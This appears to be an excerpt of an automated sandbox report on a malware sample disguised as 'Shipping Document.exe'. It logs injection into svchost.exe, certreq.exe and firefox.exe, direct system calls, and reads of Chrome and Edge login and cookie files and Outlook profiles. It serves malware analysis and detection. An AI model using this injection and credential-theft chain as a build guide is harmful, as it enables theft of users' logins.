Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h] 2_2_030649D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h] 2_2_030FA9D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h] 2_2_030BE9E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h] 2_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h] 2_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h] 2_2_030BC810
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] 2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] 2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] 2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h] 2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] 2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] 2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h] 2_2_0306A830
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h] 2_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h] 2_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h] 2_2_03042840
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_010181F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 1_2_010181F7
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FEA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00FEA395
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FEA364 SetUnhandledExceptionFilter, 1_2_00FEA364

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtWriteVirtualMemory: Direct from: 0x77762E3C Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtMapViewOfSection: Direct from: 0x77762D1C Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtNotifyChangeKey: Direct from: 0x77763C2C Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtCreateMutant: Direct from: 0x777635CC Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtResumeThread: Direct from: 0x777636AC Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtClose: Direct from: 0x77757B2E
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtQuerySystemInformation: Direct from: 0x77762DFC Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtAllocateVirtualMemory: Direct from: 0x77762BFC Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtReadFile: Direct from: 0x77762ADC Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtDelayExecution: Direct from: 0x77762DDC Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtWriteVirtualMemory: Direct from: 0x7776490C Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtQueryInformationProcess: Direct from: 0x77762C26 Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtResumeThread: Direct from: 0x77762FBC Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtCreateUserProcess: Direct from: 0x7776371C Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtSetInformationThread: Direct from: 0x777563F9 Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtOpenKeyEx: Direct from: 0x77763C9C Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtSetInformationThread: Direct from: 0x77762B4C Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtQueryAttributesFile: Direct from: 0x77762E6C Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtReadVirtualMemory: Direct from: 0x77762E8C Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtCreateKey: Direct from: 0x77762C6C Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtQuerySystemInformation: Direct from: 0x777648CC Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtAllocateVirtualMemory: Direct from: 0x777648EC Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtQueryVolumeInformationFile: Direct from: 0x77762F2C Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtOpenSection: Direct from: 0x77762E0C Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtDeviceIoControlFile: Direct from: 0x77762AEC Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtQueryValueKey: Direct from: 0x77762BEC Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtQueryInformationToken: Direct from: 0x77762CAC Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtTerminateThread: Direct from: 0x77762FCC Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtCreateFile: Direct from: 0x77762FEC Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtOpenFile: Direct from: 0x77762DCC Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtOpenKeyEx: Direct from: 0x77762B9C Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtSetInformationProcess: Direct from: 0x77762C5C Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe NtProtectVirtualMemory: Direct from: 0x77762F9C Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\certreq.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: NULL target: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: NULL target: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Thread register set: target process: 3652 Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Thread APC queued: target process: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 308008 Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01018C93 LogonUserW, 1_2_01018C93
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FC3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 1_2_00FC3B4C
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FC4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 1_2_00FC4A35
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01024F21 mouse_event, 1_2_01024F21
Source: C:\Users\user\Desktop\Shipping Document.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipping Document.exe" Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe Process created: C:\Windows\SysWOW64\certreq.exe "C:\Windows\SysWOW64\certreq.exe" Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_010181F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 1_2_010181F7
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01024C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 1_2_01024C03
Source: Shipping Document.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Shipping Document.exe, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000000.1575167368.0000000001970000.00000002.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000002.3983455529.0000000001971000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000000.1575167368.0000000001970000.00000002.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000002.3983455529.0000000001971000.00000002.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000000.1743027988.0000000001890000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000000.1575167368.0000000001970000.00000002.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000002.3983455529.0000000001971000.00000002.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000000.1743027988.0000000001890000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: ?Program Manager
Source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000000.1575167368.0000000001970000.00000002.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000002.3983455529.0000000001971000.00000002.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000000.1743027988.0000000001890000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FE886B cpuid 1_2_00FE886B
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FF50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_00FF50D7
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01002230 GetUserNameW, 1_2_01002230
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FF418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 1_2_00FF418A
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FC4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 1_2_00FC4AFE

Stealing of Sensitive Information

barindex
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\certreq.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Source: Shipping Document.exe Binary or memory string: WIN_81
Source: Shipping Document.exe Binary or memory string: WIN_XP
Source: Shipping Document.exe Binary or memory string: WIN_XPe
Source: Shipping Document.exe Binary or memory string: WIN_VISTA
Source: Shipping Document.exe Binary or memory string: WIN_7
Source: Shipping Document.exe Binary or memory string: WIN_8
Source: Shipping Document.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

barindex
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01036596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 1_2_01036596
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01036A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 1_2_01036A5A
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs